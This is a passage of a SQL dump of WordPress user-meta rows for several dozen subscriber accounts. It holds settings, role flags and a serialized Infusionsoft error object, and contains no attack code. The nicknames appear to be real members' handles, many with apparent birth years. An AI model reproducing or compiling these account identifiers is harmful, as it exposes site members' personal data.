(18324, 1401, 'rich_editing', 'true'),
(18325, 1401, 'comment_shortcuts', 'false'),
(18326, 1401, 'admin_color', 'fresh'),
(18327, 1401, 'use_ssl', '0'),
(18328, 1401, 'show_admin_bar_front', 'true'),
(18329, 1401, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18330, 1401, 'cyb_user_level', '0'),
(18331, 1401, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18332, 1401, 'default_password_nag', '1'),
(18333, 1402, 'nickname', 'caasey1992'),
(18334, 1402, 'first_name', ''),
(18335, 1402, 'last_name', ''),
(18336, 1402, 'description', ''),
(18337, 1402, 'rich_editing', 'true'),
(18338, 1402, 'comment_shortcuts', 'false'),
(18339, 1402, 'admin_color', 'fresh'),
(18340, 1402, 'use_ssl', '0'),
(18341, 1402, 'show_admin_bar_front', 'true'),
(18342, 1402, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18343, 1402, 'cyb_user_level', '0'),
(18344, 1402, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18345, 1402, 'default_password_nag', '1'),
(18346, 1403, 'nickname', 'scarlettguitar1965'),
(18347, 1403, 'first_name', ''),
(18348, 1403, 'last_name', ''),
(18349, 1403, 'description', ''),
(18350, 1403, 'rich_editing', 'true'),
(18351, 1403, 'comment_shortcuts', 'false'),
(18352, 1403, 'admin_color', 'fresh'),
(18353, 1403, 'use_ssl', '0'),
(18354, 1403, 'show_admin_bar_front', 'true'),
(18355, 1403, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18356, 1403, 'cyb_user_level', '0'),
(18357, 1403, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18358, 1403, 'default_password_nag', '1'),
(18359, 1404, 'nickname', 'jj.vanderheiden1987'),
(18360, 1404, 'first_name', ''),
(18361, 1404, 'last_name', ''),
(18362, 1404, 'description', ''),
(18363, 1404, 'rich_editing', 'true'),
(18364, 1404, 'comment_shortcuts', 'false'),
(18365, 1404, 'admin_color', 'fresh'),
(18366, 1404, 'use_ssl', '0'),
(18367, 1404, 'show_admin_bar_front', 'true'),
(18368, 1404, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18369, 1404, 'cyb_user_level', '0'),
(18370, 1404, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18371, 1404, 'default_password_nag', '1'),
(18372, 1405, 'nickname', 'daphnealiaga1962'),
(18373, 1405, 'first_name', ''),
(18374, 1405, 'last_name', ''),
(18375, 1405, 'description', ''),
(18376, 1405, 'rich_editing', 'true'),
(18377, 1405, 'comment_shortcuts', 'false'),
(18378, 1405, 'admin_color', 'fresh'),
(18379, 1405, 'use_ssl', '0'),
(18380, 1405, 'show_admin_bar_front', 'true'),
(18381, 1405, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18382, 1405, 'cyb_user_level', '0'),
(18383, 1405, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18384, 1405, 'default_password_nag', '1'),
(18385, 1406, 'nickname', 'chefjohnrod1964'),
(18386, 1406, 'first_name', ''),
(18387, 1406, 'last_name', ''),
(18388, 1406, 'description', ''),
(18389, 1406, 'rich_editing', 'true'),
(18390, 1406, 'comment_shortcuts', 'false'),
(18391, 1406, 'admin_color', 'fresh'),
(18392, 1406, 'use_ssl', '0'),
(18393, 1406, 'show_admin_bar_front', 'true'),
(18394, 1406, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18395, 1406, 'cyb_user_level', '0'),
(18396, 1406, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18397, 1406, 'default_password_nag', '1'),
(18398, 1407, 'nickname', 'sammy19061967'),
(18399, 1407, 'first_name', ''),
(18400, 1407, 'last_name', ''),
(18401, 1407, 'description', ''),
(18402, 1407, 'rich_editing', 'true'),
(18403, 1407, 'comment_shortcuts', 'false'),
(18404, 1407, 'admin_color', 'fresh'),
(18405, 1407, 'use_ssl', '0'),
(18406, 1407, 'show_admin_bar_front', 'true'),
(18407, 1407, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18408, 1407, 'cyb_user_level', '0'),
(18409, 1407, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18410, 1407, 'default_password_nag', '1'),
(18411, 1408, 'nickname', 'benjamin1990'),
(18412, 1408, 'first_name', ''),
(18413, 1408, 'last_name', ''),
(18414, 1408, 'description', ''),
(18415, 1408, 'rich_editing', 'true'),
(18416, 1408, 'comment_shortcuts', 'false'),
(18417, 1408, 'admin_color', 'fresh'),
(18418, 1408, 'use_ssl', '0'),
(18419, 1408, 'show_admin_bar_front', 'true'),
(18420, 1408, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18421, 1408, 'cyb_user_level', '0'),
(18422, 1408, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18423, 1408, 'default_password_nag', '1'),
(18424, 1409, 'nickname', 'dfyturtle1973'),
(18425, 1409, 'first_name', ''),
(18426, 1409, 'last_name', ''),
(18427, 1409, 'description', ''),
(18428, 1409, 'rich_editing', 'true'),
(18429, 1409, 'comment_shortcuts', 'false'),
(18430, 1409, 'admin_color', 'fresh'),
(18431, 1409, 'use_ssl', '0'),
(18432, 1409, 'show_admin_bar_front', 'true'),
(18433, 1409, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18434, 1409, 'cyb_user_level', '0'),
(18435, 1409, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18436, 1409, 'default_password_nag', '1'),
(18437, 1410, 'nickname', 'thpafton1957'),
(18438, 1410, 'first_name', ''),
(18439, 1410, 'last_name', ''),
(18440, 1410, 'description', ''),
(18441, 1410, 'rich_editing', 'true'),
(18442, 1410, 'comment_shortcuts', 'false'),
(18443, 1410, 'admin_color', 'fresh'),
(18444, 1410, 'use_ssl', '0'),
(18445, 1410, 'show_admin_bar_front', 'true'),
(18446, 1410, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18447, 1410, 'cyb_user_level', '0'),
(18448, 1410, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18449, 1410, 'default_password_nag', '1'),
(18450, 1411, 'nickname', 'emily.lorna.steele1983'),
(18451, 1411, 'first_name', ''),
(18452, 1411, 'last_name', ''),
(18453, 1411, 'description', ''),
(18454, 1411, 'rich_editing', 'true'),
(18455, 1411, 'comment_shortcuts', 'false'),
(18456, 1411, 'admin_color', 'fresh'),
(18457, 1411, 'use_ssl', '0'),
(18458, 1411, 'show_admin_bar_front', 'true'),
(18459, 1411, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18460, 1411, 'cyb_user_level', '0'),
(18461, 1411, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18462, 1411, 'default_password_nag', '1'),
(18463, 1412, 'nickname', 'jackieeisenbarth1972'),
(18464, 1412, 'first_name', ''),
(18465, 1412, 'last_name', ''),
(18466, 1412, 'description', ''),
(18467, 1412, 'rich_editing', 'true'),
(18468, 1412, 'comment_shortcuts', 'false'),
(18469, 1412, 'admin_color', 'fresh'),
(18470, 1412, 'use_ssl', '0'),
(18471, 1412, 'show_admin_bar_front', 'true'),
(18472, 1412, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18473, 1412, 'cyb_user_level', '0'),
(18474, 1412, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18475, 1412, 'default_password_nag', '1'),
(18476, 1413, 'nickname', 'dmarie83021956'),
(18477, 1413, 'first_name', ''),
(18478, 1413, 'last_name', ''),
(18479, 1413, 'description', ''),
(18480, 1413, 'rich_editing', 'true'),
(18481, 1413, 'comment_shortcuts', 'false'),
(18482, 1413, 'admin_color', 'fresh'),
(18483, 1413, 'use_ssl', '0'),
(18484, 1413, 'show_admin_bar_front', 'true'),
(18485, 1413, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18486, 1413, 'cyb_user_level', '0'),
(18487, 1413, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18488, 1413, 'default_password_nag', '1'),
(18489, 1414, 'nickname', 'changalanc1992'),
(18490, 1414, 'first_name', ''),
(18491, 1414, 'last_name', ''),
(18492, 1414, 'description', ''),
(18493, 1414, 'rich_editing', 'true'),
(18494, 1414, 'comment_shortcuts', 'false'),
(18495, 1414, 'admin_color', 'fresh'),
(18496, 1414, 'use_ssl', '0'),
(18497, 1414, 'show_admin_bar_front', 'true'),
(18498, 1414, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18499, 1414, 'cyb_user_level', '0'),
(18500, 1414, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18501, 1414, 'default_password_nag', '1'),
(18502, 1415, 'nickname', 'rhokanov1977'),
(18503, 1415, 'first_name', ''),
(18504, 1415, 'last_name', ''),
(18505, 1415, 'description', ''),
(18506, 1415, 'rich_editing', 'true'),
(18507, 1415, 'comment_shortcuts', 'false'),
(18508, 1415, 'admin_color', 'fresh'),
(18509, 1415, 'use_ssl', '0'),
(18510, 1415, 'show_admin_bar_front', 'true'),
(18511, 1415, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18512, 1415, 'cyb_user_level', '0'),
(18513, 1415, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18514, 1415, 'default_password_nag', '1'),
(18515, 1416, 'nickname', 'irvin.trinidad1970'),
(18516, 1416, 'first_name', ''),
(18517, 1416, 'last_name', ''),
(18518, 1416, 'description', ''),
(18519, 1416, 'rich_editing', 'true'),
(18520, 1416, 'comment_shortcuts', 'false'),
(18521, 1416, 'admin_color', 'fresh'),
(18522, 1416, 'use_ssl', '0'),
(18523, 1416, 'show_admin_bar_front', 'true'),
(18524, 1416, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18525, 1416, 'cyb_user_level', '0'),
(18526, 1416, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18527, 1416, 'default_password_nag', '1'),
(18528, 1417, 'nickname', 'christin.cns.131964'),
(18529, 1417, 'first_name', ''),
(18530, 1417, 'last_name', ''),
(18531, 1417, 'description', ''),
(18532, 1417, 'rich_editing', 'true'),
(18533, 1417, 'comment_shortcuts', 'false'),
(18534, 1417, 'admin_color', 'fresh'),
(18535, 1417, 'use_ssl', '0'),
(18536, 1417, 'show_admin_bar_front', 'true'),
(18537, 1417, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18538, 1417, 'cyb_user_level', '0'),
(18539, 1417, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18540, 1417, 'default_password_nag', '1'),
(18541, 1418, 'nickname', 'samantha_sandifer1951'),
(18542, 1418, 'first_name', ''),
(18543, 1418, 'last_name', ''),
(18544, 1418, 'description', ''),
(18545, 1418, 'rich_editing', 'true'),
(18546, 1418, 'comment_shortcuts', 'false'),
(18547, 1418, 'admin_color', 'fresh'),
(18548, 1418, 'use_ssl', '0'),
(18549, 1418, 'show_admin_bar_front', 'true'),
(18550, 1418, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18551, 1418, 'cyb_user_level', '0'),
(18552, 1418, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18553, 1418, 'default_password_nag', '1'),
(18554, 1419, 'nickname', 'markisnear1968'),
(18555, 1419, 'first_name', ''),
(18556, 1419, 'last_name', ''),
(18557, 1419, 'description', ''),
(18558, 1419, 'rich_editing', 'true'),
(18559, 1419, 'comment_shortcuts', 'false'),
(18560, 1419, 'admin_color', 'fresh'),
(18561, 1419, 'use_ssl', '0'),
(18562, 1419, 'show_admin_bar_front', 'true'),
(18563, 1419, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18564, 1419, 'cyb_user_level', '0'),
(18565, 1419, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18566, 1419, 'default_password_nag', '1'),
(18567, 1420, 'nickname', 'bethdiesch1956'),
(18568, 1420, 'first_name', ''),
(18569, 1420, 'last_name', ''),
(18570, 1420, 'description', ''),
(18571, 1420, 'rich_editing', 'true'),
(18572, 1420, 'comment_shortcuts', 'false'),
(18573, 1420, 'admin_color', 'fresh'),
(18574, 1420, 'use_ssl', '0'),
(18575, 1420, 'show_admin_bar_front', 'true'),
(18576, 1420, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18577, 1420, 'cyb_user_level', '0'),
(18578, 1420, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18579, 1420, 'default_password_nag', '1'),
(18580, 1421, 'nickname', 'dhughes25881995'),
(18581, 1421, 'first_name', ''),
(18582, 1421, 'last_name', ''),
(18583, 1421, 'description', ''),
(18584, 1421, 'rich_editing', 'true'),
(18585, 1421, 'comment_shortcuts', 'false'),
(18586, 1421, 'admin_color', 'fresh'),
(18587, 1421, 'use_ssl', '0'),
(18588, 1421, 'show_admin_bar_front', 'true'),
(18589, 1421, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18590, 1421, 'cyb_user_level', '0'),
(18591, 1421, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18592, 1421, 'default_password_nag', '1'),
(18593, 1422, 'nickname', 'aelnattar1985'),
(18594, 1422, 'first_name', ''),
(18595, 1422, 'last_name', ''),
(18596, 1422, 'description', ''),
(18597, 1422, 'rich_editing', 'true'),
(18598, 1422, 'comment_shortcuts', 'false'),
(18599, 1422, 'admin_color', 'fresh'),
(18600, 1422, 'use_ssl', '0'),
(18601, 1422, 'show_admin_bar_front', 'true'),
(18602, 1422, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18603, 1422, 'cyb_user_level', '0'),
(18604, 1422, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18605, 1422, 'default_password_nag', '1'),
(18606, 1423, 'nickname', 'iaoovang871967'),
(18607, 1423, 'first_name', ''),
(18608, 1423, 'last_name', ''),
(18609, 1423, 'description', ''),
(18610, 1423, 'rich_editing', 'true'),
(18611, 1423, 'comment_shortcuts', 'false'),
(18612, 1423, 'admin_color', 'fresh'),
(18613, 1423, 'use_ssl', '0'),
(18614, 1423, 'show_admin_bar_front', 'true'),
(18615, 1423, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18616, 1423, 'cyb_user_level', '0'),
(18617, 1423, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18618, 1423, 'default_password_nag', '1'),
(18619, 1424, 'nickname', 'stativaana1991'),
(18620, 1424, 'first_name', ''),
(18621, 1424, 'last_name', ''),
(18622, 1424, 'description', ''),
(18623, 1424, 'rich_editing', 'true'),
(18624, 1424, 'comment_shortcuts', 'false'),
(18625, 1424, 'admin_color', 'fresh'),
(18626, 1424, 'use_ssl', '0'),
(18627, 1424, 'show_admin_bar_front', 'true'),
(18628, 1424, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18629, 1424, 'cyb_user_level', '0'),
(18630, 1424, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18631, 1424, 'default_password_nag', '1'),
(18632, 1425, 'nickname', 'rtutko1959'),
(18633, 1425, 'first_name', ''),
(18634, 1425, 'last_name', ''),
(18635, 1425, 'description', ''),
(18636, 1425, 'rich_editing', 'true'),
(18637, 1425, 'comment_shortcuts', 'false'),
(18638, 1425, 'admin_color', 'fresh'),
(18639, 1425, 'use_ssl', '0'),
(18640, 1425, 'show_admin_bar_front', 'true'),
(18641, 1425, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18642, 1425, 'cyb_user_level', '0'),
(18643, 1425, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18644, 1425, 'default_password_nag', '1'),
(18645, 1426, 'nickname', 'ellisasan1996'),
(18646, 1426, 'first_name', ''),
(18647, 1426, 'last_name', ''),
(18648, 1426, 'description', ''),
(18649, 1426, 'rich_editing', 'true'),
(18650, 1426, 'comment_shortcuts', 'false'),
(18651, 1426, 'admin_color', 'fresh'),
(18652, 1426, 'use_ssl', '0'),
(18653, 1426, 'show_admin_bar_front', 'true'),
(18654, 1426, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18655, 1426, 'cyb_user_level', '0'),
(18656, 1426, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18657, 1426, 'default_password_nag', '1'),
(18658, 1427, 'nickname', 'alek.boyd1960'),
(18659, 1427, 'first_name', ''),
(18660, 1427, 'last_name', ''),
(18661, 1427, 'description', ''),
(18662, 1427, 'rich_editing', 'true'),
(18663, 1427, 'comment_shortcuts', 'false'),
(18664, 1427, 'admin_color', 'fresh'),
(18665, 1427, 'use_ssl', '0'),
(18666, 1427, 'show_admin_bar_front', 'true'),
(18667, 1427, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18668, 1427, 'cyb_user_level', '0'),
(18669, 1427, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18670, 1427, 'default_password_nag', '1'),
(18671, 1428, 'nickname', 'harelazulay1975'),
(18672, 1428, 'first_name', ''),
(18673, 1428, 'last_name', ''),
(18674, 1428, 'description', ''),
(18675, 1428, 'rich_editing', 'true'),
(18676, 1428, 'comment_shortcuts', 'false'),
(18677, 1428, 'admin_color', 'fresh'),
(18678, 1428, 'use_ssl', '0'),
(18679, 1428, 'show_admin_bar_front', 'true'),
(18680, 1428, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18681, 1428, 'cyb_user_level', '0'),
(18682, 1428, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18683, 1428, 'default_password_nag', '1'),
(18684, 1429, 'nickname', 'pdraker2003'),
(18685, 1429, 'first_name', ''),
(18686, 1429, 'last_name', ''),
(18687, 1429, 'description', ''),
(18688, 1429, 'rich_editing', 'true'),
(18689, 1429, 'comment_shortcuts', 'false'),
(18690, 1429, 'admin_color', 'fresh'),
(18691, 1429, 'use_ssl', '0'),
(18692, 1429, 'show_admin_bar_front', 'true'),
(18693, 1429, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18694, 1429, 'cyb_user_level', '0'),
(18695, 1429, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18696, 1429, 'default_password_nag', '1'),
(18697, 1430, 'nickname', '522jack1950'),
(18698, 1430, 'first_name', ''),
(18699, 1430, 'last_name', ''),
(18700, 1430, 'description', ''),
(18701, 1430, 'rich_editing', 'true'),
(18702, 1430, 'comment_shortcuts', 'false'),
(18703, 1430, 'admin_color', 'fresh'),
(18704, 1430, 'use_ssl', '0'),
(18705, 1430, 'show_admin_bar_front', 'true'),
(18706, 1430, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18707, 1430, 'cyb_user_level', '0'),
(18708, 1430, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18709, 1430, 'default_password_nag', '1'),
(18710, 1431, 'nickname', 'cupcakes1031974'),
(18711, 1431, 'first_name', ''),
(18712, 1431, 'last_name', ''),
(18713, 1431, 'description', ''),
(18714, 1431, 'rich_editing', 'true'),
(18715, 1431, 'comment_shortcuts', 'false'),
(18716, 1431, 'admin_color', 'fresh'),
(18717, 1431, 'use_ssl', '0'),
(18718, 1431, 'show_admin_bar_front', 'true'),
(18719, 1431, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18720, 1431, 'cyb_user_level', '0'),
(18721, 1431, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18722, 1431, 'default_password_nag', '1'),
(18723, 1432, 'nickname', 'a1andb21954'),
(18724, 1432, 'first_name', ''),
(18725, 1432, 'last_name', ''),
(18726, 1432, 'description', ''),
(18727, 1432, 'rich_editing', 'true'),
(18728, 1432, 'comment_shortcuts', 'false'),
(18729, 1432, 'admin_color', 'fresh'),
(18730, 1432, 'use_ssl', '0'),
(18731, 1432, 'show_admin_bar_front', 'true'),
(18732, 1432, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18733, 1432, 'cyb_user_level', '0'),
(18734, 1432, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18735, 1432, 'default_password_nag', '1'),
(18736, 1433, 'nickname', 'obrown942004'),
(18737, 1433, 'first_name', ''),
(18738, 1433, 'last_name', ''),
(18739, 1433, 'description', ''),
(18740, 1433, 'rich_editing', 'true'),
(18741, 1433, 'comment_shortcuts', 'false'),
(18742, 1433, 'admin_color', 'fresh'),
(18743, 1433, 'use_ssl', '0'),
(18744, 1433, 'show_admin_bar_front', 'true'),
(18745, 1433, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18746, 1433, 'cyb_user_level', '0'),
(18747, 1433, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18748, 1433, 'default_password_nag', '1'),
(18749, 1434, 'nickname', 'ihatesnakes1975'),
(18750, 1434, 'first_name', ''),
(18751, 1434, 'last_name', ''),
(18752, 1434, 'description', ''),
(18753, 1434, 'rich_editing', 'true'),
(18754, 1434, 'comment_shortcuts', 'false'),
(18755, 1434, 'admin_color', 'fresh'),
(18756, 1434, 'use_ssl', '0'),
(18757, 1434, 'show_admin_bar_front', 'true'),
(18758, 1434, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18759, 1434, 'cyb_user_level', '0'),
(18760, 1434, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18761, 1434, 'default_password_nag', '1'),
(18762, 1435, 'nickname', 'lerix1977'),
(18763, 1435, 'first_name', ''),
(18764, 1435, 'last_name', ''),
(18765, 1435, 'description', ''),
(18766, 1435, 'rich_editing', 'true'),
(18767, 1435, 'comment_shortcuts', 'false'),
(18768, 1435, 'admin_color', 'fresh'),
(18769, 1435, 'use_ssl', '0'),
(18770, 1435, 'show_admin_bar_front', 'true'),
(18771, 1435, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18772, 1435, 'cyb_user_level', '0'),
(18773, 1435, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18774, 1435, 'default_password_nag', '1'),
(18775, 1436, 'nickname', 'dutesman0091955'),
(18776, 1436, 'first_name', ''),
(18777, 1436, 'last_name', ''),
(18778, 1436, 'description', ''),
(18779, 1436, 'rich_editing', 'true'),
(18780, 1436, 'comment_shortcuts', 'false'),
(18781, 1436, 'admin_color', 'fresh'),
(18782, 1436, 'use_ssl', '0'),
(18783, 1436, 'show_admin_bar_front', 'true'),
(18784, 1436, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18785, 1436, 'cyb_user_level', '0'),
(18786, 1436, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18787, 1436, 'default_password_nag', '1'),
(18788, 1437, 'nickname', 'jfclement_pr1975'),
(18789, 1437, 'first_name', ''),
(18790, 1437, 'last_name', ''),
(18791, 1437, 'description', ''),
(18792, 1437, 'rich_editing', 'true'),
(18793, 1437, 'comment_shortcuts', 'false'),
(18794, 1437, 'admin_color', 'fresh'),
(18795, 1437, 'use_ssl', '0'),
(18796, 1437, 'show_admin_bar_front', 'true'),
(18797, 1437, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18798, 1437, 'cyb_user_level', '0'),
(18799, 1437, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18800, 1437, 'default_password_nag', '1'),
(18801, 1438, 'nickname', 'an.m.nguyen1953'),
(18802, 1438, 'first_name', ''),
(18803, 1438, 'last_name', ''),
(18804, 1438, 'description', ''),
(18805, 1438, 'rich_editing', 'true'),
(18806, 1438, 'comment_shortcuts', 'false'),
(18807, 1438, 'admin_color', 'fresh'),
(18808, 1438, 'use_ssl', '0'),
(18809, 1438, 'show_admin_bar_front', 'true'),
(18810, 1438, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(18811, 1438, 'cyb_user_level', '0'),
(18812, 1438, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(18813, 1438, 'default_password_nag', '1'),
